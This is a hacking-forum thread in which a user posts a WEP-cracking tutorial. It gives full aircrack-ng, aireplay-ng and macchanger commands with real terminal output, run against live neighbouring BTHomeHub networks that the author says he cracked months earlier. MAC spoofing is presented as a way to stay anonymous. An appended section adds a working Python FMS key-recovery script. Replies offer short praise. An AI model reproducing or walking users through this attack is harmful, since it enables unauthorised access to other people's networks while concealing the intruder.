Wireless Network Penetration: WEP Encryption
  • Sh3llc0d3
    Posts: 1,910
    Wireless Network Penetration: WEP Encryption
    Written by me, and as always all rights belong to me. Don't copy unless permission is given.

    Why do this tut?
    Well, I know this is a new forum and some newer members to hacking may want a tutorial to guide them through the process. Not only that, but experienced members can use this as a reference. I wrote this a while ago, but I like it because, as you will see, I've put the outputs I got on screen while completing the tasks.

    What will we be doing?
    Basic WEP encryption crack to gain access to a network, nothing special just the basic execution of the aircrack-ng suite.

    What will you need?
    Ubuntu/Mint/Backtrack/etc... [Any Linux distro basically, you can also use these tools in Windows but I will be concentrating only with Linux methods at the moment.]
    Aircrack-ng suite.
    Compatible wireless interface that supports packet injection; I personally prefer the ALFA 1000mW USB interface. If you want to find out what hardware is compatible, Google search "BackTrack HCL" [hardware compatibility list].

    A word of warning: what we will be doing (well, what I'll be doing and you following) is illegal if you breach a network/system you do not own or have permission to access. So set up a fake AP [Access Point] and practice, or get permission.

    Right guys, let's crack on [haha]. I will be using Linux Mint 8 'Helena' for this demo, as this type of tutorial has been replicated so many times on Back|Track and I thought I'd do it on a more widely used non-pentesting distro. These commands and tutorials can be replicated on many different distros.

    If you haven't got Back|Track then you'll need some basic tools to turn your distro into a wireless cracking machine (well, for WEP anyway).
    To download/install Aircrack-ng suite:
    sudo apt-get install aircrack-ng

    To download/install macchanger:
    sudo apt-get install macchanger


    **Now I am assuming that you have your wireless interface connected already. I will be using live networks and blocking out the addresses [XX:XX:XX:XX:XX:XX is the address I will be cracking.]**

    Make sure you aren't connected to the internet on the wireless interface you're going to be using to crack, and use the following to view the interfaces picked up by the Aircrack suite.

    First switch to root:
    sudo su


    I'll be copying as I go, so the commands are after the '#' symbol. This isn't 'cos it's easier for me, but so you can see the outputs I get and compare them to your own if you go wrong.
    Hacktop semtex-primed # airmon-ng

    Interface   Chipset     Driver
    wlan0       RTL8187     rtl8187 - [phy1]
    wlan1       Unknown     ndiswrapper

    From this we can see wlan0 is my ALFA USB interface and wlan1 is my built-in Broadcom wireless. The Broadcom cannot be used for cracking, so we forget this and only need wlan0. First we need to change the MAC address for anonymity.

    To stop the interface:
    Hacktop semtex-primed # airmon-ng stop wlan0
    Interface   Chipset     Driver
    wlan0       RTL8187     rtl8187 - [phy1]
                            (monitor mode disabled)
    wlan1       Unknown     ndiswrapper


    To change the MAC [You can replace 00:11:22:33:44:55 with any MAC address you wish to spoof]:
    Hacktop semtex-primed # macchanger --mac 00:11:22:33:44:55 wlan0
    Current MAC: XX:XX:XX:XX:XX:XX (Alfa, Inc.)
    Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)


    To re-enable the interface and put it in monitor mode:
    Hacktop semtex-primed # airmon-ng start wlan0
    Found 5 processes that could cause trouble.

    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID Name
    841 avahi-daemon
    842 avahi-daemon
    1207 NetworkManager
    1436 wpa_supplicant
    4507 dhclient
    Process with PID 4507 (dhclient) is running on interface wlan1

    Interface   Chipset     Driver
    wlan0       RTL8187     rtl8187 - [phy1]
                            (monitor mode enabled on mon0)
    wlan1       Unknown     ndiswrapper

    Don't worry about the errors/warnings. You will also notice it has created an interface called 'mon0', which is wlan0 in monitor mode.

    Now we have set everything up we can scan for nearby Access Points [APs].
    Hacktop semtex-primed # airodump-ng mon0

    The output lists the networks that our interface can pick up; generally, the higher up the list, the better the connection will be.
     CH  3 ][ Elapsed: 4 s ][ 2010-04-05 04:24

     BSSID              PWR  Beacons  #Data, #/s  CH  MB    ENC   CIPHER  AUTH  ESSID

     XX:XX:XX:XX:XX:XX  -55       11      0    0   7  54e   WEP   WEP           BTHom
     XX:XX:XX:XX:XX:XX  -72        5      0    0  11  54 .  WPA   TKIP    PSK   NETGE
     XX:XX:XX:XX:XX:XX  -72        6      0    0   1  54e.  WPA2  CCMP    PSK   guest
     XX:XX:XX:XX:XX:XX  -73        6      0    0   1  54e.  WPA2  CCMP    PSK   River
     XX:XX:XX:XX:XX:XX  -75        2      0    0  11  54e   OPN                 BTOpe
     XX:XX:XX:XX:XX:XX  -76        2      0    0  11  54e   WEP   WEP           BTHom

     BSSID              STATION            PWR   Rate  Lost  Packets  Probes


    Then stop the search with "Ctrl+C" when you have an AP that has WEP encryption. Here I have two, both of which I cracked months ago and have the passwords for already, but for these purposes I'll be using them. For reference, they're the first and last ones.

    So we need to isolate and monitor ONE of these using the command below [-c is the channel of the AP, -w states the filename you wish to write to, and --bssid is the address of the AP you wish to crack]:
    Hacktop semtex-primed # airodump-ng -c 7 -w wep --bssid XX:XX:XX:XX:XX:XX wlan0

    And the output:
     CH  7 ][ Elapsed: 8 s ][ 2010-04-05 04:39

     BSSID              PWR  RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER  AUTH  ESSID
     XX:XX:XX:XX:XX:XX  -54  100      106     11    0   7  54e  WEP  WEP           BTHomeHub-0F6B

     BSSID              STATION            PWR   Rate  Lost  Packets


    What we're interested in is the #Data column. When we start monitoring packets we need this to get to at least 5k [5000]. It can take more, but a general rule is don't try the last step until it hits 5k worth of IVs.

    So our next move is to associate our interface with the AP, as at the moment all we have is an AP we're monitoring. In a new terminal window follow these commands, but don't close the current terminal session!!!
    Hacktop semtex-primed # aireplay-ng -1 0 -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 mon0

    The output:
    The interface MAC (--:--:--:--:--:--) doesn't match the specified MAC (-h).
    ifconfig mon0 hw ether 00:11:22:33:44:55
    05:00:16 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 7

    05:00:16 Sending Authentication Request (Open System) [ACK]
    05:00:16 Authentication successful
    05:00:16 Sending Association Request [ACK]
    05:00:16 Association successful :-) (AID: 1)

    Now we are associated. If you go back to your first terminal window, you will see your interface listed at the bottom, associated with the AP.

    Next up is us getting the packets [ARP & ACKs], we do this in the same terminal using:
    Hacktop semtex-primed # aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 mon0

    The output of this will be the interface collecting the packets. Don't cancel it whatever happens!!! This is important: if you get a De-auth [de-authorised packet], use Ctrl+C to stop the collection of packets, use the association command again, and try this again when that's completed.

    So once we have the minimum required amount of IVs [5000], we open a 3rd terminal window and type:
    Hacktop semtex-primed # aircrack-ng -b XX:XX:XX:XX:XX:XX wep-01.cap

    Where -b is the address of the AP, and "wep" is replaced by the filename you chose initially. This will show aircrack-ng attempting to find the key. It will stop if it can't find it and wait for more IVs. Once it has enough data it will present you with the key in an AD:12:AS:AS:AF:GE type format; remove the ':' and you have the password!

    Thank you and goodnight xD
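Why the #Data/IV count in the post matters, as an added example that is not part of Sh3llc0d3's post: every WEP frame is RC4-encrypted under IV||key with the 3-byte IV sent in clear, and the first plaintext byte of a data frame is always 0xAA (LLC/SNAP), so each captured frame hands the attacker a known keystream byte for a known IV. The script below implements the classic FMS statistical attack on that leak (one of the attacks behind aircrack-ng's older KoreK mode, `-K`; the PTW attack that current aircrack-ng uses by default needs far fewer frames, and the 5k figure above is the author's rule of thumb, not a fixed requirement). The 40-bit key `1f2a3b4c5d`, the frame payload and the deliberately chosen weak-IV set `(A+3, 255, X)` are all constructed for the demo; nothing here touches a radio.

```python
"""Toy FMS attack on WEP: why captured IVs leak the key.

Added example, not part of the thread. Key, IVs and traffic are all
constructed here so it runs offline; nothing is captured from a real AP.
"""
import zlib
from collections import Counter

SNAP_FIRST_BYTE = 0xAA  # every 802.11 data frame body starts with LLC/SNAP: AA AA 03 ...


def ksa(key, steps=256):
    """RC4 key scheduling. With steps < 256 only the first rounds are run and
    the current j is returned with S; the attacker can replay those rounds
    because they depend only on the IV (sent in clear) and already-recovered key bytes."""
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4(key, data):
    """RC4 encrypt/decrypt: XOR the data with the PRGA keystream."""
    S, _ = ksa(key)
    i = j = 0
    out = bytearray()
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key, iv, payload):
    """WEP frame body: IV(3) | key-id(1) | RC4_{IV||key}(payload | CRC32 ICV)."""
    icv = zlib.crc32(payload).to_bytes(4, "little")
    return iv + b"\x00" + rc4(iv + key, payload + icv)


def wep_decrypt(key, body):
    """Return the payload, or None if the ICV does not check out."""
    plain = rc4(body[:3] + key, body[4:])
    data, icv = plain[:-4], plain[-4:]
    return data if zlib.crc32(data).to_bytes(4, "little") == icv else None


def fms_votes(frames, known):
    """Vote on key byte K[B], where B = 3 + len(known) counts the IV bytes.

    For roughly 5% of IVs the KSA state after B rounds is 'resolved': the
    remaining rounds leave S[1], S[S[1]] and S[B] alone, so the first
    keystream byte equals the value swapped into S[B] at round B, which
    depends directly on K[B]. That keystream byte is known because the
    first plaintext byte (0xAA) is. Unresolved IVs vote roughly at random."""
    B = 3 + len(known)
    votes = Counter()
    for body in frames:
        z = body[4] ^ SNAP_FIRST_BYTE            # first keystream byte
        S, j = ksa(body[:3] + known, steps=B)    # replay the rounds we can
        s1 = S[1]
        if s1 < B and (s1 + S[s1]) & 0xFF == B:  # resolved condition
            votes[(S.index(z) - j - S[B]) & 0xFF] += 1
    return votes


def fms_recover(frames, key_len, top=5):
    """Depth-first search over the top vote-getters for each byte. A candidate
    key is accepted only if it decrypts a frame with a valid ICV, which is how
    a candidate WEP key is verified in practice."""
    def search(prefix):
        if len(prefix) == key_len:
            return prefix if wep_decrypt(prefix, frames[0]) is not None else None
        for byte, _ in fms_votes(frames, prefix).most_common(top):
            found = search(prefix + bytes([byte]))
            if found is not None:
                return found
        return None
    return search(b"")


def demo_frames(key):
    """Constructed traffic: one ARP-sized frame for every weak IV (A+3, 255, X).
    A real capture only collects such IVs by chance, which is why the tutorial
    replays ARP frames until #Data is in the thousands."""
    payload = bytes.fromhex("aaaa030000000806") + bytes(28)  # LLC/SNAP + ARP ethertype + filler
    return [wep_encrypt(key, bytes([a + 3, 0xFF, x]), payload)
            for a in range(len(key)) for x in range(256)]


if __name__ == "__main__":
    secret = bytes.fromhex("1f2a3b4c5d")  # hypothetical 40-bit WEP key
    recovered = fms_recover(demo_frames(secret), key_len=len(secret))
    print("recovered key:", recovered.hex())  # 1f2a3b4c5d
```

This is also why `aireplay-ng -3` replays ARP requests specifically: ARP frames have a fixed size and a known first byte, and every replay makes the AP answer with a fresh IV, so the capture fills with exactly the kind of (IV, known keystream byte) pairs the statistics need. A 104-bit key only makes the search above run for 13 bytes instead of 5; it does not change the weakness, which is the reason WEP is unacceptable on any network you are responsible for.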
  • chroniccommand
    Posts: 1,389
    Easy. But nice information.
  • rx-
    Posts: 169
    nice guide for beginners
  • Sh3llc0d3
    Posts: 1,910
    @chroniccommand - Yeah defo lol
    @rx- - Agreed. Like CC pointed out it's a bit noobish, but everyone has to start somewhere. Dreaming up my next advanced tutorial at the moment. Getting knuckled down with some learning after that; I've been writing tuts and helping people a bit too much recently with skid stuff. Glad to see people a lot more clued up about stuff here though.
  • Xin
    Posts: 3,251
    Great paper, still essential to everyone even if it is for beginners.
    Xin
  • Bursihido
    Posts: 406
    Excellent job bro :)